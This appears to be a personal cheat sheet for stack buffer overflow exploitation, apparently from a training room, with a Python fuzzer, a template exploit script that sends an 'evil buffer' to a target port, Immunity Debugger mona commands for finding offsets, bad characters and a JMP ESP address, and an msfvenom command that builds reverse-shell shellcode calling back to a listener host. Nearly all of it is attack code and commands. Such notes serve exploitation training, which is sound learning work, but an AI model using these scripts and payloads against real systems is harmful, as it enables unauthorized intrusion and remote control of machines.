Buffer Overflow

Python

Scripts got from Buffer Overflow Prep

Fuzzer

#!/usr/bin/env python3

import socket, time, sys

ip = "[IP]"

port = [PORT]
timeout = 5
prefix = "[PREFIX] "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Exploit

#!/usr/bin/env python3
import socket

ip = "[IP]"
port = [PORT]
# bad_chars = "\x00"
# jmp_esp = "\xaf\x11\x50\x62"
prefix = "[PREFIX] "
offset = 0
overflow = "A" * offset
retn = "[RETN-ADDRESS]"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

MONA Immunity Debugger

Set working folder

!mona config -set workingfolder c:\mona\%p

Find offset

!mona findmsp -distance 600

Generate bytearray excluding null byte (\x00).

!mona bytearray -b "\x00"

Get badchars by comparing generated bytearray and current memory (After sending list of badchars).

!mona compare -f D:\Programs\Immunity Debugger\Mona\bytearray.bin -a <ESP address>

Find Jump point without badchars

!mona jmp -r esp -cpb "\x00\x0a"

List modules

!mona modules

nasm_shell

Location: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
Assembly: JMP ESP
Hexadecimal: FFE4

Generating shellcode

Msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.195.128 LPORT=4444 EXITFUNC=thread -f c -a x86